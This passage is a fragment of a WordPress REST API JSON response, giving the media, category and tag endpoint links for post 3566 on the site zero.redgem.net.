dex.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3566"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3566"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3566"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}